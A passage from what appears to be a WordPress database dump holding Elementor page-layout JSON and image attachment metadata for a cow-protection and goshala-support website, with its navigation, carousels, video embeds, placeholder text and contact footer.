d\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10443,1739,'_elementor_page_assets','a:0:{}'),(10448,1741,'_wp_attached_file','2022/10/pexels-min-an-1455455-scaled.jpg'),(10449,1741,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1633;s:4:\"file\";s:40:\"2022/10/pexels-min-an-1455455-scaled.jpg\";s:8:\"filesize\";i:473335;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"pexels-min-an-1455455-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13078;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"pexels-min-an-1455455-1024x653.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97199;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"pexels-min-an-1455455-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7804;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"pexels-min-an-1455455-768x490.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:490;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59131;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"pexels-min-an-1455455-1536x980.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:980;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199306;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:35:\"pexels-min-an-1455455-2048x1307.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1307;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:326090;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"pexels-min-an-1455455-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20289;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:31:\"pexels-min-an-1455455-50x32.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3904;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"pexels-min-an-1455455-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5629;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:31:\"pexels-min-an-1455455-48x31.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3855;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:31:\"pexels-min-an-1455455-48x31.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3855;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:25:\"pexels-min-an-1455455.jpg\";}'),(10450,1742,'_wp_attached_file','2022/10/pexels-roman-odintsov-8747798-scaled.jpg'),(10451,1742,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:48:\"2022/10/pexels-roman-odintsov-8747798-scaled.jpg\";s:8:\"filesize\";i:760112;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"pexels-roman-odintsov-8747798-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18551;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"pexels-roman-odintsov-8747798-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153196;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"pexels-roman-odintsov-8747798-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9370;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"pexels-roman-odintsov-8747798-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90764;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:43:\"pexels-roman-odintsov-8747798-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:312531;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:43:\"pexels-roman-odintsov-8747798-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:517185;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:41:\"pexels-roman-odintsov-8747798-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27174;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:39:\"pexels-roman-odintsov-8747798-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4125;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:41:\"pexels-roman-odintsov-8747798-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6358;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:39:\"pexels-roman-odintsov-8747798-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3990;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:39:\"pexels-roman-odintsov-8747798-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3990;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:33:\"pexels-roman-odintsov-8747798.jpg\";}'),(10452,1743,'_elementor_edit_mode','builder'),(10453,1743,'_elementor_template_type','wp-page'),(10454,1743,'_elementor_version','3.7.8'),(10455,1743,'_wp_page_template','elementor_canvas'),(10456,1743,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 